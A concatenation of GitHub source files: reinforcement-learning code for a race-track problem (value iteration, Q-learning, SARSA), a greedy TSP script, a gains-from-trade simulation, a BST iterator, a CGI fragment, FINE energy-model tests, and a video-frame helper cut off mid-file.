velocity and returns its end\n        # state. 
It knows nothing about the track structure.\n        new_state = self.rc.apply_acc_change_get_state(\n            state_x, state_y, x_velocity, y_velocity, action_x_acc_delta, action_y_acc_delta\n        )\n        # The rules of this model restrict that the velocity in the x and y dimensions cannot be outside the range of -5 to +5.\n        if new_state.x_velocity > 5 or new_state.x_velocity < -5 or new_state.y_velocity > 5 or new_state.y_velocity < -5:\n            return None\n        # Check the path from the old position to the new position by asking the track if the car is allowed to travel from the previous state\n        # to the new state\n        final_x_pos, final_y_pos = self.rt.move_along_line(state_x, state_y, new_state.x_pos, new_state.y_pos)\n        # If the track says the car ends at a position that is different from the new state, it has hit a wall.\n        if new_state.x_pos != final_x_pos or new_state.y_pos != final_y_pos:\n            # You've hit a wall...\n            if self.crash_means_restart: # Crash means restart at the start position\n                # Crashing into the wall behind the goal is allowed\n                if self.rt.track_matrix[final_y_pos][final_x_pos] == \"F\":\n                    return State(final_x_pos, final_y_pos, 0, 0)\n                LOG.debug(\"CRASHED - going back to start\")\n                return State(self.rc.start_x, self.rc.start_y, 0, 0)\n            else: # Crash means go to the last legal position\n                LOG.debug(\"CRASHED - zeroing velocity\")\n                return State(final_x_pos, final_y_pos, 0, 0)\n        # There was no collision and the new state is legal.\n        return new_state\n\n    # Calculate Qt(S, A)\n    def calc_action_q(self, prev_t_v, state_x, state_y, x_velocity, y_velocity, action: Action):\n        # Generate the final state of a successful action...\n        successful_action_result = self.calc_action_outcome(\n            state_x, state_y, x_velocity, y_velocity, action.x_acc_delta, action.y_acc_delta\n        )\n        if successful_action_result is None: # The action has no result, as the velocity would exceed the limit\n            return float('-inf')\n        # Calculate the successful-action score contribution, which occurs 80% of the time\n        successful_action_value = (0.80) * prev_t_v[successful_action_result]\n        # An unsuccessful action will not apply any acceleration change\n        unsuccessful_action_result = self.calc_action_outcome(\n            state_x, state_y, x_velocity, y_velocity, 0, 0\n        )\n        # Calculate the unsuccessful-action score contribution, which occurs 20% of the time..\n        unsuccessful_action_value = (0.20) * prev_t_v[unsuccessful_action_result]\n        # Get the destination reward\n        destination_reward = self.reward(successful_action_result.x_pos, successful_action_result.y_pos)\n        # Return Qt(S, A)\n        return destination_reward + (self.lr * (successful_action_value + unsuccessful_action_value))
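\n\n    # Note: calc_action_q above is the stochastic Bellman backup used by value iteration,\n    # Q_t(s, a) = R(s') + lr * (0.8 * V_{t-1}(s'_success) + 0.2 * V_{t-1}(s'_fail)),\n    # where the 0.8/0.2 split encodes this model's rule that an acceleration command only\n    # takes effect 80% of the time (self.lr plays the role of the discount factor here).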
\n\n    # Used to perform the value iteration algorithm.\n    def learn_policy(self):\n        check_state = State(1, 6, 0, 0) # Used for debugging... It is the start state on the L track...\n        for time_state in range(1, self.mi+1): # Do max_iterations number of passes over the state space\n            LOG.info(f\"Computing state space iteration: {time_state}\")\n            old_values = self.rc.v.copy() # Copy the current state of V for the current set of calculations..\n            for state in self.rt.legal_states(): # Iterate through all states the race car can take on the race track\n                best_action, best_action_q = None, float('-inf') # Used to store the best action seen so far\n                if state == check_state:\n                    LOG.debug(f\"Populating @ time {time_state}: {state} {self.rt.track_matrix[state.y_pos][state.x_pos]}\")\n                # Iterate through all actions\n                for action in self.rc.actions():\n                    # Calculate Qt(S, A)\n                    action_q_score = self.calc_action_q(\n                        old_values, state.x_pos, state.y_pos, state.x_velocity, state.y_velocity, action\n                    )\n                    if state == check_state:\n                        LOG.debug(f\"{action} has Qt(S, A) score {action_q_score}\")\n                    # Save the best one\n                    if action_q_score > best_action_q:\n                        best_action = action\n                        best_action_q = action_q_score\n                # Save the best action and its score as the acceleration policy and V value at the current state\n                self.rc.acceleration_policy[state] = best_action\n                self.rc.v[state] = best_action_q\n                if state == check_state:\n                    LOG.debug(f\"{state} V value updated to {best_action_q} from action {action}\")\n        # Once the policy is learned - print the car's path through the track.\n        race_durations = []\n\n        for _ in range(NUM_RACES):\n            race_durations.append(self.animate_car_policy()) # Animate the car policy\n        LOG.info(f\"Race times from {NUM_RACES} attempts: {race_durations}\")\n        LOG.info(f\"Average race duration: {str(mean(race_durations))}\")\n\n    # Used to animate the car moving through the track with the current policy..\n    def animate_car_policy(self):\n        max_allowed_steps = 400\n        time_state = 1\n        x_velocity, y_velocity = 0, 0\n        x_pos, y_pos = self.rc.start_x, self.rc.start_y\n        state = State(x_pos, y_pos, x_velocity, y_velocity) # Get the start state\n        track = copy.deepcopy(self.rt.track_matrix)\n        while True:\n            # Only allow 400 steps in an attempt to reach the finish line\n            if time_state == max_allowed_steps or state is None:\n                print(f\"Unable to reach finish line after {time_state} iterations\")\n                return time_state\n            os.system('cls' if os.name == 'nt' else 'clear') # Clear the terminal for printing the track\n            track[state.y_pos][state.x_pos] = str(time_state)[-1] # Mark on the track that a spot has been reached\n            # for row in track: # Print track..\n            #     print(row)\n            if self.rt.track_matrix[state.y_pos][state.x_pos] == \"F\": # You've reached the finish line\n                print(f\"Reached finish line after {time_state} steps\")\n                return time_state\n            policy_state_action = self.rc.acceleration_policy[state] # Get the best action from the policy\n            # Allow for a 20% chance that the action fails.\n            non_deterministic_factor = random() \n            if non_deterministic_factor <= 0.20:\n                next_state = self.calc_action_outcome(\n                    state.x_pos, state.y_pos, state.x_velocity, state.y_velocity,\n                    0, 0\n                )\n                print(f\"At time {time_state} \", \"from\", state, \"action policy failed [non-deterministic result] to state\", str(next_state))\n            else: # Take the action stored in the policy...\n                next_state = self.calc_action_outcome(\n                    state.x_pos, state.y_pos, state.x_velocity, state.y_velocity,\n                    policy_state_action.x_acc_delta, policy_state_action.y_acc_delta\n                )\n                print(f\"At time {time_state} \", \"from\", state, \"took\", self.rc.acceleration_policy[state], \"to state\", str(next_state))\n            state = next_state\n            time_state += 1\n        return time_state
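\n\n# Note: animate_car_policy samples the same 80/20 action-success model that the planner\n# is evaluated against in calc_action_q, so averaging race durations over NUM_RACES runs\n# gives a Monte Carlo estimate of the learned policy's expected time to the finish line.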
\n\n# Class that extends the ValueIteration implementation to utilize its RaceCar/RaceTrack management but overrides its\n# learn_policy method to implement the Q-learning algorithm.\nclass QLearning(RaceTrackValueIteration):\n\n    # Similar to value iteration with the addition of a discount rate\n    def __init__(self, race_track: RaceTrack, race_car: RaceCar, learning_rate: float, max_episodes: int,\n        crash_means_restart: bool, discount_rate: float\n    ):\n        self.rt = race_track\n        self.rc = race_car\n        self.lr = learning_rate\n        self.dr = discount_rate \n        self.curr_episode = 0\n        self.me = max_episodes\n        self.epsilon = 0.95 # Baseline epsilon for epsilon-greedy selection of the next action\n        self.crash_means_restart = crash_means_restart\n\n    # This method takes the Q(S, A) table/dictionary and populates the policy with the A that maximizes Q(S, A) for \n    # each S.\n    def populate_car_policy_from_q(self, q):\n        for state in q.keys():\n            self.rc.acceleration_policy[state] = max(q[state], key=q[state].get)\n\n    # Calculates the update of Q(S, A) using the score of taking the action at the previous state and taking the action\n    # with the highest score at the next state.\n    def calculate_q_update(self, q, prev_state, new_state, action):\n        reward = -1 # This calculation only happens when not at a finish line state, so the reward is a cost of -1\n        action_score = q[prev_state][action]\n        # The action at the new state is chosen as the one with the highest Q score at the next state.\n        next_state_action_max_score = max(q[new_state].values())\n        LOG.debug(f\"Chose from next state {new_state} action with max score: {next_state_action_max_score}\")\n        return ( action_score\n            + (self.lr*(reward + self.dr*next_state_action_max_score - action_score))\n        )\n\n    # Epsilon-greedy selection of the action at the current state..\n    def pick_next_action(self, q, state):\n        # Start with a high epsilon and gradually decrease it as more episodes occur...\n        working_epsilon = (float(self.me - self.curr_episode) / self.me) * 0.95\n        rand_float = random() # Returns a random number between 0 and 1...\n        # with epsilon probability, choose a random action...\n        if rand_float <= working_epsilon:\n            action = np.random.choice(list(q[state]))\n        else: # with 1-epsilon probability, choose the best action...\n            action = max(q[state], key=q[state].get)\n        return action\n\n    # Initialize the q table/dictionary with random values for each action at each legal state.\n    def initialize_q(self):\n        q = {}\n        for state in self.rt.legal_states():\n            q[state] = {}\n            for action in self.rc.actions():\n                q[state][action] = random()\n        return q
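\n\n    # Note: calculate_q_update above is the standard tabular (off-policy TD) Q-learning\n    # update, Q(s, a) <- Q(s, a) + lr * (r + dr * max_a' Q(s', a') - Q(s, a)), with the\n    # constant step cost r = -1 used throughout this model.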
\n\n    # Implementation of the Q-learning algorithm.\n    def learn_policy(self):\n        check_state = State(1, 6, 0, 0) # Used for debugging... It is the start state on the L track...\n        # Initialize all Q(s, a) arbitrarily.\n        q = self.initialize_q()\n        self.curr_episode = 0 # updates whenever the race car leaves from the start...\n        for episode_iteration in range(self.me): # Do max_episodes number of episodes.\n            LOG.info(f\"Performing episode iteration: {episode_iteration} / {self.me}\")\n            # Reset the end-state Q scores...\n            for end_state in self.rt.end_states():\n                q[end_state] = {}\n                for action in self.rc.actions():\n                    q[end_state][action] = 0.0\n            # Start from the RaceCar's start position.\n            state = State(self.rc.start_x, self.rc.start_y, 0, 0)\n            if state == check_state:\n                value_string = \"\\n\".join([f\"{str(key)} - {str(value)}\" for key, value in q[state].items()])\n                LOG.debug(\n                    f\"On {episode_iteration} episode {state} {self.rt.track_matrix[state.y_pos][state.x_pos]} has Q values...\\n {value_string}\")\n            while True:\n                LOG.debug(f\"At {state}\")\n                if self.rt.track_matrix[state.y_pos][state.x_pos] == \"S\":\n                    self.curr_episode += 1\n\n                # print(self.curr_episode)\n                # tc = copy.deepcopy(self.rt.track_matrix)\n                # tc[state.y_pos][state.x_pos] = \"X\"\n                # for row in tc:\n                #     print(row)\n                # os.system('cls' if os.name == 'nt' else 'clear')\n\n                # Epsilon-greedy policy to pick the action at this state...\n                next_action = self.pick_next_action(q, state)\n                # Calculate the outcome of taking next_action at the current state. calc_action_outcome will return None\n                # if the action taken at the current state pushes the velocity outside of the -5 to +5 range rule.\n                new_state = self.calc_action_outcome(\n                    state.x_pos, state.y_pos, state.x_velocity, state.y_velocity,\n                    next_action.x_acc_delta, next_action.y_acc_delta\n                )\n                # Pick actions until one with a legal consequence is chosen.\n                while new_state is None:\n                    q[state].pop(next_action) # next_action is illegal at the current state, so it should be removed\n                    next_action = self.pick_next_action(q, state)\n                    new_state = self.calc_action_outcome(\n                        state.x_pos, state.y_pos, state.x_velocity, state.y_velocity,\n                        next_action.x_acc_delta, next_action.y_acc_delta\n                    )\n                LOG.debug(f\"Chose {next_action} to get to {new_state}\")\n                # Update Q with the results of the action\n                q_s_a_update = self.calculate_q_update(q, state, new_state, next_action)\n                LOG.debug(f\"Updating Q(S, A) for {state}, {next_action}, to {q_s_a_update}\")\n                q[state][next_action] = q_s_a_update\n                # If the race car has reached the finish - stop the current episode.\n                if self.rt.track_matrix[new_state.y_pos][new_state.x_pos] == \"F\":\n                    break\n                # Update the state\n                state = new_state\n            os.system('cls' if os.name == 'nt' else 'clear')\n        self.populate_car_policy_from_q(q) # Populate the car policy from Q\n        race_durations = []\n        for _ in range(NUM_RACES):\n            race_durations.append(self.animate_car_policy()) # Animate the car policy\n        LOG.info(f\"Race times from {NUM_RACES} attempts: {race_durations}\")\n        LOG.info(f\"Average race duration: {str(mean(race_durations))}\")
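\n\n# Note: the only difference between QLearning above and SARSA below is the bootstrap\n# target. Q-learning backs up max_a' Q(s', a') (off-policy), while SARSA backs up\n# Q(s', a') for an a' drawn from the same epsilon-greedy behavior policy (on-policy):\n# Q(s, a) <- Q(s, a) + lr * (r + dr * Q(s', a') - Q(s, a)).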
\n\n\n# Class that extends the QLearning implementation to utilize its RaceCar/RaceTrack management in addition to its learning\n# protocol\nclass SARSA(QLearning):\n\n    # The only difference between Q-learning and SARSA is how the Q score update of Q(S, A) is calculated. \n    # Here it uses the same protocol to choose the next action in the next state as it did to choose the current action\n    # at the previous state. This is different from Q-learning, where the next action is chosen as the one with the max Q\n    # score at the next state.\n    def calculate_q_update(self, q, prev_state, new_state, action):\n        reward = -1 # This calculation only happens when not at a finish line state, so the reward is a cost of -1\n        action_score = q[prev_state][action]\n        next_state_action = self.pick_next_action(q, new_state) # Pick an action at the next state using epsilon-greedy\n        LOG.debug(f\"Chose from next state {new_state} {next_state_action} using epsilon-greedy choice\")\n        return ( action_score\n            + (self.lr*(reward + self.dr*q[new_state][next_state_action] - action_score))\n        )\n","repo_name":"notmaurox/pyml","sub_path":"src/learning_algorithms/racetrack_value_iteration.py","file_name":"racetrack_value_iteration.py","file_ext":"py","file_size_in_byte":17259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7413743197","text":"# Greedy algorithm\r\nimport pandas as pd\r\nimport numpy as np\r\nimport math\r\nimport torch\r\nimport time\r\ndef getset(citynumber,samples):\r\n    torch.manual_seed(66)\r\n    data_set = []\r\n    for l in range(samples):\r\n        # generate coordinates uniformly in [0, 1]\r\n        x = torch.FloatTensor(2, citynumber*2).uniform_(0, 1)\r\n        data_set.append(x)\r\n    return data_set\r\ntrainset=getset(10,100)\r\ndata_set=[]\r\nfor i in range(100):\r\n    data_set.append(np.array(trainset[i]))\r\n#print(data_set)\r\nprint(data_set[0][1])\r\ndist=np.zeros((10,10))\r\ntotal=0\r\nfor p in range(100):\r\n    for i in range(10):\r\n        for j in range(10):\r\n            dist[i][j]=math.sqrt((data_set[p][1][i]-data_set[p][1][j])**2+(data_set[p][0][i]-data_set[p][0][j])**2)\r\n    i=1\r\n    n=10\r\n    j=0\r\n    sumpath=0\r\n    s=[]\r\n    s.append(0)\r\n    start = time.perf_counter()\r\n    while True:\r\n        k=1\r\n        Detemp=10000000\r\n        while True:\r\n            l=0\r\n            flag=0\r\n            if k in s:\r\n                flag = 1\r\n            if (flag==0) and (dist[k][s[i-1]] < Detemp):\r\n                j = k\r\n                Detemp=dist[k][s[i - 1]]\r\n            k+=1\r\n            if k>=n:\r\n                break\r\n        s.append(j)\r\n        i+=1\r\n        sumpath+=Detemp\r\n        if i>=n:\r\n            break\r\n    sumpath+=dist[0][j]\r\n    end = time.perf_counter()\r\n    print(\"Result:\")\r\n    total+=sumpath\r\n    print(sumpath)\r\n    for m in range(n):\r\n        print(\"%s \"%(s[m]),end='')\r\nprint(total/100)","repo_name":"shercoo/TSP-Pointer_network","sub_path":"REINFORCEMENT/greedy.py","file_name":"greedy.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"24380476940","text":"import sys\nsys.path.append('../')\nfrom functions import gft_functions, virtual_valuation_functions\nimport csv\nimport time\nimport itertools\nimport random\nstarttime = time.time()\n\n\n# y is the size of the buyer/seller supports\ny = 100\n\n# x is the range of buyer/seller supports\nx = 20\n\n# Sets buyer/seller valuations\nbuyervaluation = list(range(1, y+1))\nsellervaluation = list(range(0, y))\n\nn = len(buyervaluation)\nm = len(sellervaluation)\n\n\n\n\n# Writes rows of sorted data list into csv file\nwith open('/Users/stevenma/PycharmProjects/gainsfromtradeupdated/data/buyer = '+str(len(buyervaluation))+', seller = '+str(len(sellervaluation))+', randomized with utility.csv', 'a') as csvfile:\n    writer = csv.writer(csvfile)\n    while True:\n        buyer_virtual_valuation = [sellervaluation[random.randint(0,x)] for x in range(n)]\n        buyer_virtual_valuation = sorted(buyer_virtual_valuation)\n        buyer_density = virtual_valuation_functions.virtualvaluationbuyerinverse(buyervaluation, buyer_virtual_valuation, 1)\n\n        seller_density = 
buyer_density[::-1]\n\n\n data = gft_functions.utility_computer(sellervaluation, seller_density, buyervaluation, buyer_density)\n\n if ((data[0] + data[1]) / data[2]<=.86):\n row = [data[0], data[1], data[2], (data[0]+data[1])/data[2], buyer_density, seller_density]\n print(\"hello\", (data[0]+data[1])/data[2])\n\n else:\n row = [data[0], data[1], data[2], (data[0] + data[1]) / data[2]]\n\n writer.writerow(row)\n\n\n\ncsvfile.close()\n\n","repo_name":"stevensiqima/223-code","sub_path":"uncorrelated/uncorrelated_random_density_utility_computer.py","file_name":"uncorrelated_random_density_utility_computer.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7833719450","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\nExample of iterate a tree:\niterator = BSTIterator(root)\nwhile iterator.hasNext():\n node = iterator.next()\n do something for node \n\"\"\"\n\n\n\n# 2018.1.1 Inorder Morris O(1)\nclass BSTIterator:\n \"\"\"\n @param: root: The root of binary tree.\n \"\"\"\n def __init__(self, root):\n # do intialization if necessary\n self.cur = root\n\n \"\"\"\n @return: True if there has next node, or false\n \"\"\"\n def hasNext(self):\n # write your code here\n return True if self.cur else False\n\n \"\"\"\n @return: return next node\n \"\"\"\n def next(self):\n # write your code here\n res = None\n cur = self.cur\n while cur:\n if not cur.left:\n res = cur\n cur = cur.right\n break\n else:\n pre = cur.left\n while pre.right and pre.right != cur:\n pre = pre.right\n if pre.right != cur:\n pre.right = cur\n cur = cur.left\n else:\n res = cur\n pre.right = None\n cur = cur.right\n break\n self.cur = cur\n return res\n\n","repo_name":"yihanc/LC","sub_path":"LINTCODE/86_binary_search_tree_iterator.py","file_name":"86_binary_search_tree_iterator.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13549912799","text":"import sys\nimport os\n\n\ndef fgrep(file, wrd):\n\tval=[line for line in file if line.startswith(wrd)]\t\t\t\n\treturn val\n\n\ndef exe_cgi(content):\n\tstream = os.popen(content)\n\treturn stream.read()\n\ndef cgi_handler(server_res, content):\n\top = exe_cgi(content).splitlines()\n\tserver_res=server_res.splitlines()\n\tl_op=fgrep(op, \"Location:\" )\n\tif l_op:\n\t\tserver_res[0]=\"HTTP/1.1 302 Found\"\n\t\tserver_res.app\n\n\n","repo_name":"kritikagarg/HTTP-Webserver-implementation","sub_path":"cgi_file.py","file_name":"cgi_file.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"562657427","text":"import pytest\n\nimport FINE as fn\n\n\ndef test_export_to_dict_minimal(minimal_test_esM):\n # EXPECTED\n expected_esm_dict = dict(\n zip(\n (\n \"locations\",\n \"commodities\",\n \"stochasticModel\",\n \"commodityUnitsDict\",\n \"numberOfTimeSteps\",\n \"hoursPerTimeStep\",\n \"startYear\",\n \"numberOfInvestmentPeriods\",\n \"investmentPeriodInterval\",\n \"costUnit\",\n \"lengthUnit\",\n \"verboseLogLevel\",\n \"balanceLimit\",\n \"pathwayBalanceLimit\",\n \"annuityPerpetuity\",\n ),\n (\n minimal_test_esM.locations,\n minimal_test_esM.commodities,\n minimal_test_esM.stochasticModel,\n minimal_test_esM.commodityUnitsDict,\n minimal_test_esM.numberOfTimeSteps,\n 
minimal_test_esM.hoursPerTimeStep,\n minimal_test_esM.startYear,\n minimal_test_esM.numberOfInvestmentPeriods,\n minimal_test_esM.investmentPeriodInterval,\n minimal_test_esM.costUnit,\n minimal_test_esM.lengthUnit,\n minimal_test_esM.verboseLogLevel,\n minimal_test_esM.balanceLimit,\n minimal_test_esM.pathwayBalanceLimit,\n minimal_test_esM.annuityPerpetuity,\n ),\n )\n )\n\n expected_Electrolyzers_investPerCapacity = minimal_test_esM.getComponentAttribute(\n \"Electrolyzers\", \"investPerCapacity\"\n )\n expected_Electricitymarket_operationRateMax = (\n minimal_test_esM.getComponentAttribute(\"Electricity market\", \"operationRateMax\")\n )\n expected_Industrysite_operationRateFix = minimal_test_esM.getComponentAttribute(\n \"Industry site\", \"operationRateFix\"\n )\n\n # FUNCTION CALL\n output_esm_dict, output_comp_dict = fn.dictIO.exportToDict(minimal_test_esM)\n\n output_Conversion_investPerCapacity = (\n output_comp_dict.get(\"Conversion\").get(\"Electrolyzers\").get(\"investPerCapacity\")\n )\n output_Source_operationRateMax = (\n output_comp_dict.get(\"Source\").get(\"Electricity market\").get(\"operationRateMax\")\n )\n output_Sink_operationRateFix = (\n output_comp_dict.get(\"Sink\").get(\"Industry site\").get(\"operationRateFix\")\n )\n\n # ASSERTION\n assert output_esm_dict == expected_esm_dict\n assert (\n expected_Electrolyzers_investPerCapacity == output_Conversion_investPerCapacity\n )\n assert expected_Electricitymarket_operationRateMax.equals(\n output_Source_operationRateMax\n )\n assert expected_Industrysite_operationRateFix.equals(output_Sink_operationRateFix)\n\n\ndef test_export_to_dict_singlenode(single_node_test_esM):\n # EXPECTED\n expected_esm_dict = dict(\n zip(\n (\n \"locations\",\n \"commodities\",\n \"stochasticModel\",\n \"commodityUnitsDict\",\n \"numberOfTimeSteps\",\n \"hoursPerTimeStep\",\n \"startYear\",\n \"numberOfInvestmentPeriods\",\n \"investmentPeriodInterval\",\n \"costUnit\",\n \"lengthUnit\",\n \"verboseLogLevel\",\n \"balanceLimit\",\n \"pathwayBalanceLimit\",\n \"annuityPerpetuity\",\n ),\n (\n single_node_test_esM.locations,\n single_node_test_esM.commodities,\n single_node_test_esM.stochasticModel,\n single_node_test_esM.commodityUnitsDict,\n single_node_test_esM.numberOfTimeSteps,\n single_node_test_esM.hoursPerTimeStep,\n single_node_test_esM.startYear,\n single_node_test_esM.numberOfInvestmentPeriods,\n single_node_test_esM.investmentPeriodInterval,\n single_node_test_esM.costUnit,\n single_node_test_esM.lengthUnit,\n single_node_test_esM.verboseLogLevel,\n single_node_test_esM.balanceLimit,\n single_node_test_esM.pathwayBalanceLimit,\n single_node_test_esM.annuityPerpetuity,\n ),\n )\n )\n\n expected_Electrolyzers_investPerCapacity = (\n single_node_test_esM.getComponentAttribute(\"Electrolyzers\", \"investPerCapacity\")\n )\n expected_Electricitymarket_operationRateMax = (\n single_node_test_esM.getComponentAttribute(\n \"Electricity market\", \"operationRateMax\"\n )\n )\n expected_Industrysite_operationRateFix = single_node_test_esM.getComponentAttribute(\n \"Industry site\", \"operationRateFix\"\n )\n\n # FUNCTION CALL\n output_esm_dict, output_comp_dict = fn.dictIO.exportToDict(single_node_test_esM)\n\n output_Conversion_investPerCapacity = (\n output_comp_dict.get(\"Conversion\").get(\"Electrolyzers\").get(\"investPerCapacity\")\n )\n output_Source_operationRateMax = (\n output_comp_dict.get(\"Source\").get(\"Electricity market\").get(\"operationRateMax\")\n )\n output_Sink_operationRateFix = (\n 
output_comp_dict.get(\"Sink\").get(\"Industry site\").get(\"operationRateFix\")\n )\n\n # ASSERTION\n assert output_esm_dict == expected_esm_dict\n assert (\n expected_Electrolyzers_investPerCapacity == output_Conversion_investPerCapacity\n )\n assert expected_Electricitymarket_operationRateMax.equals(\n output_Source_operationRateMax\n )\n assert expected_Industrysite_operationRateFix.equals(output_Sink_operationRateFix)\n\n\ndef test_export_to_dict_multinode(multi_node_test_esM_init):\n # EXPECTED\n expected_esm_dict = dict(\n zip(\n (\n \"locations\",\n \"commodities\",\n \"stochasticModel\",\n \"commodityUnitsDict\",\n \"numberOfTimeSteps\",\n \"hoursPerTimeStep\",\n \"numberOfInvestmentPeriods\",\n \"investmentPeriodInterval\",\n \"startYear\",\n \"costUnit\",\n \"lengthUnit\",\n \"verboseLogLevel\",\n \"balanceLimit\",\n \"pathwayBalanceLimit\",\n \"annuityPerpetuity\",\n ),\n (\n multi_node_test_esM_init.locations,\n multi_node_test_esM_init.commodities,\n multi_node_test_esM_init.stochasticModel,\n multi_node_test_esM_init.commodityUnitsDict,\n multi_node_test_esM_init.numberOfTimeSteps,\n multi_node_test_esM_init.hoursPerTimeStep,\n multi_node_test_esM_init.numberOfInvestmentPeriods,\n multi_node_test_esM_init.investmentPeriodInterval,\n multi_node_test_esM_init.startYear,\n multi_node_test_esM_init.costUnit,\n multi_node_test_esM_init.lengthUnit,\n multi_node_test_esM_init.verboseLogLevel,\n multi_node_test_esM_init.balanceLimit,\n multi_node_test_esM_init.pathwayBalanceLimit,\n multi_node_test_esM_init.annuityPerpetuity,\n ),\n )\n )\n\n expected_Windonshore_operationRateMax = (\n multi_node_test_esM_init.getComponentAttribute(\n \"Wind (onshore)\", \"operationRateMax\"\n )\n )\n expected_CCGTplantsmethane_investPerCapacity = (\n multi_node_test_esM_init.getComponentAttribute(\n \"CCGT plants (methane)\", \"investPerCapacity\"\n )\n )\n expected_Saltcavernshydrogen_capacityMax = (\n multi_node_test_esM_init.getComponentAttribute(\n \"Salt caverns (hydrogen)\", \"capacityMax\"\n )\n )\n expected_ACcables_reactances = multi_node_test_esM_init.getComponentAttribute(\n \"AC cables\", \"reactances\"\n )\n expected_Hydrogendemand_operationRateFix = (\n multi_node_test_esM_init.getComponentAttribute(\n \"Hydrogen demand\", \"operationRateFix\"\n )\n )\n\n # FUNCTION CALL\n output_esm_dict, output_comp_dict = fn.dictIO.exportToDict(multi_node_test_esM_init)\n\n output_Windonshore_operationRateMax = (\n output_comp_dict.get(\"Source\").get(\"Wind (onshore)\").get(\"operationRateMax\")\n )\n output_CCGTplantsmethane_investPerCapacity = (\n output_comp_dict.get(\"Conversion\")\n .get(\"CCGT plants (methane)\")\n .get(\"investPerCapacity\")\n )\n output_Saltcavernshydrogen_capacityMax = (\n output_comp_dict.get(\"Storage\")\n .get(\"Salt caverns (hydrogen)\")\n .get(\"capacityMax\")\n )\n output_ACcables_reactances = (\n output_comp_dict.get(\"LinearOptimalPowerFlow\")\n .get(\"AC cables\")\n .get(\"reactances\")\n )\n output_Hydrogendemand_operationRateFix = (\n output_comp_dict.get(\"Sink\").get(\"Hydrogen demand\").get(\"operationRateFix\")\n )\n\n # ASSERTION\n assert output_esm_dict == expected_esm_dict\n assert expected_Windonshore_operationRateMax.equals(\n output_Windonshore_operationRateMax\n )\n assert (\n expected_CCGTplantsmethane_investPerCapacity\n == output_CCGTplantsmethane_investPerCapacity\n )\n assert expected_Saltcavernshydrogen_capacityMax.equals(\n output_Saltcavernshydrogen_capacityMax\n )\n assert expected_ACcables_reactances.equals(output_ACcables_reactances)\n 
assert expected_Hydrogendemand_operationRateFix.equals(\n output_Hydrogendemand_operationRateFix\n )\n\n\n@pytest.mark.parametrize(\n \"test_esM_fixture\", [\"minimal_test_esM\", \"multi_node_test_esM_init\"]\n)\ndef test_import_from_dict(test_esM_fixture, request):\n test_esM = request.getfixturevalue(test_esM_fixture)\n\n # FUNCTION CALL\n ## get dicts\n esm_dict, comp_dict = fn.dictIO.exportToDict(test_esM)\n ## call the function on dicts\n output_esM = fn.dictIO.importFromDict(esm_dict, comp_dict)\n\n # EXPECTED (AND OUTPUT)\n expected_locations = test_esM.locations\n expected_commodityUnitsDict = test_esM.commodityUnitsDict\n\n if test_esM_fixture == \"minimal_test_esM\":\n ## expected\n expected_df = test_esM.getComponentAttribute(\n \"Electricity market\", \"operationRateMax\"\n )\n expected_series = None\n expected_value = test_esM.getComponentAttribute(\n \"Electrolyzers\", \"investPerCapacity\"\n )\n ## output\n output_df = output_esM.getComponentAttribute(\n \"Electricity market\", \"operationRateMax\"\n )\n output_df.reset_index(level=0, drop=True, inplace=True)\n\n output_value = output_esM.getComponentAttribute(\n \"Electrolyzers\", \"investPerCapacity\"\n )\n output_series = None\n\n else:\n ## expected\n expected_df = test_esM.getComponentAttribute(\n \"Hydrogen demand\", \"operationRateFix\"\n )\n expected_series = test_esM.getComponentAttribute(\n \"AC cables\", \"reactances\"\n ).sort_index()\n expected_value = test_esM.getComponentAttribute(\n \"Existing run-of-river plants\", \"investPerCapacity\"\n )\n ## output\n output_df = output_esM.getComponentAttribute(\n \"Hydrogen demand\", \"operationRateFix\"\n )\n output_df.reset_index(level=0, drop=True, inplace=True)\n\n output_series = output_esM.getComponentAttribute(\n \"AC cables\", \"reactances\"\n ).sort_index()\n output_value = output_esM.getComponentAttribute(\n \"Existing run-of-river plants\", \"investPerCapacity\"\n )\n assert output_series.equals(expected_series)\n\n # ASSERTION\n assert output_esM.locations == expected_locations\n assert output_esM.commodityUnitsDict == expected_commodityUnitsDict\n\n assert output_df.equals(expected_df)\n assert output_value == expected_value\n","repo_name":"FZJ-IEK3-VSA/FINE","sub_path":"test/IOManagement/test_dictIO.py","file_name":"test_dictIO.py","file_ext":"py","file_size_in_byte":11852,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"37"} +{"seq_id":"19982426571","text":"from Code.GUI_helper import *\nimport matplotlib.pyplot as plt\n\n\n# This file contains useful functions for using the programs and visualizing the results, such as breaking a new input\n# sequence into frames, creating a new video from the resulting frames and creating multiple panoramas.\n\n\ndef video2frames(file_name):\n \"\"\"\n This function reads the given video and breaks it down into frames. 
Moreover, a naive 10x\n    fast-forward video can be produced from these frames by sampling every 10th frame uniformly.\n    :param file_name: The name of the video that should be broken into frames.\n    \"\"\"\n    # Create a VideoCapture object and read from the input file\n    cap = cv2.VideoCapture('../Videos/' + file_name + '.mp4')\n    os.system('mkdir ../Data/' + file_name)\n\n    # Check if the capture opened successfully\n    if not cap.isOpened():\n        print(\"Error opening video stream or file\")\n\n    # Read until the video is completed\n    i = 1\n    while cap.isOpened():\n        # Capture frame-by-frame\n        ret, frame = cap.read()\n        if ret:\n            # Display and save the resulting frame\n            cv2.imshow('Frame', frame)\n            cv2.imwrite('../Data/' + file_name + '/' + file_name + str(i) + '.jpg', frame)\n\n            # Press Q on the keyboard to exit\n            if cv2.waitKey(10) & 0xFF == ord('q'):\n                break\n        else:\n            break\n        i += 1\n\n    cap.release()\n    # Close all the frames\n    cv2.destroyAllWindows()\n\n\ndef frames2video(dir):\n    \"\"\"\n    Creates a new output video from the frames in the specified dir.\n    \"\"\"\n    frames = load_images(dir)\n    im_shape = frames[-1].shape\n    out = cv2.VideoWriter('../Results/train-in-snow-reversed.avi', cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 30,\n                          (im_shape[1], 